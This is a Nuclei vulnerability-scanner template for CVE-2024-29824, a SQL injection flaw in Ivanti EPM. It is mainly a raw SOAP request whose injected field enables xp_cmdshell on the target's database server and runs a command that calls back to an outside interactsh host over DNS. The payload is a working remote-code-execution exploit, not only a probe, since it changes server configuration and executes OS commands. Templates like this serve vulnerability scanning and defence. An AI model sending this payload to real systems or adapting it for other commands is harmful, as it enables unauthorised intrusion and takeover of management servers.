id: CVE-2024-29824 info: name: Ivanti EPM - Remote Code Execution author: DhiyaneshDK severity: critical description: | An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. reference: - https://github.com/horizon3ai/CVE-2024-29824 - https://nvd.nist.gov/vuln/detail/CVE-2024-29824 - https://forums.ivanti.com/s/article/Security-Advisory-May-2024 - https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/ classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2024-29824 metadata: max-request: 1 tags: cve,cve2024,ivanti,epm,sqli,rce http: - raw: - | POST /WSStatusEvents/EventHandler.asmx HTTP/1.1 Host: {{Hostname}} Content-Type: application/soap+xml string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'-- matchers-condition: and matchers: - type: word part: content_type words: - 'application/soap+xml' - type: word part: body words: - 'UpdateStatusEventsResponse' - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: status status: - 200 # digest: 4a0a00473045022100d84da116a277ed9833fc747a1c135c6366cde3aadf2d270b957064c59679589902202205108a6149c74c7760992f3fea37504cea6e77358a9c4796017f70b7d30384:922c64590222798bb761d5b6d8e72950